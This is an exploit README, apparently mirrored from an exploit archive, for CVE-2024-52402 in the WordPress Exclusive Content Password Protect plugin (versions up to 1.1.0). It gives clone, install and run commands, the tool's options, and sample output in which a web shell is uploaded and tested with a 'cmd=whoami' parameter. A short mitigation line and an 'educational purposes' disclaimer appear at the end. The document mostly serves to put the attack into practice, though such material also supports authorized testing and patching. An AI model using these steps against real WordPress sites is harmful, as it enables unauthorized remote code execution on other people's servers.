Share 
## https://sploitus.com/exploit?id=2C4D395B-1EF0-5F7B-9B57-544D7DFAB98C
# πŸš€ Exploit for CVE-2024-52402: WordPress Exclusive Content Password Protect Plugin <= 1.1.0

## πŸ›‘οΈ Overview

This exploit targets a Cross-Site Request Forgery (CSRF) vulnerability in the WordPress Exclusive Content Password Protect plugin, versions up to and including 1.1.0. This vulnerability allows an attacker to upload a web shell to the web server, leading to potential remote code execution.

### πŸ“… Details

- **Published:** 2024-11-19
- **CVE ID:** CVE-2024-52402
- **Plugin Version:** Exclusive Content Password Protect <= 1.1.0
- **Severity:** CRITICAL (CVSS 9.6)


## βš™οΈ Usage

To exploit this vulnerability, you need to provide the target WordPress site URL, a valid WordPress username, and password. The exploit script will log in to the WordPress site and attempt to upload a web shell.

### πŸ”§ Command

```sh
python CVE-2024-52402.py -u <target> -un <username> -p <password>
```

### πŸ› οΈ Options

```
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

### 🌟 Example

```sh
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
```

## πŸš€ Output Example

```sh
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
```

## πŸ“œ Description



This script exploits the CSRF vulnerability in the Exclusive Content Password Protect plugin to upload a Web Shell
 to the WordPress server. However, it does not execute a CSRF attack 
directly; instead, it focuses on leveraging the plugin’s file upload 
functionality to achieve exploitation.
## πŸ‘¨β€πŸ’» How to Run the Script

1. **Clone the Repository**
   ```sh
   git clone https://github.com/Nxploited/CVE-2024-52402.git
   cd CVE-2024-52402
   ```

2. **Install Requirements**
   Ensure you have `requests` library installed:
   ```sh
   pip install requests
   ```

3. **Run the Script**
   Use the following command to execute the script:
   ```sh
   python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
   ```

## πŸ›‘οΈ Mitigation

To mitigate this vulnerability, update the Exclusive Content Password Protect plugin to the latest version where this issue has been fixed.

## ⚠️ Disclaimer

This script is intended for educational purposes only. Unauthorized use of this script against systems that you do not have explicit permission to test is illegal and unethical.


***Exploit By: Nxploit , Khaled alenazi.***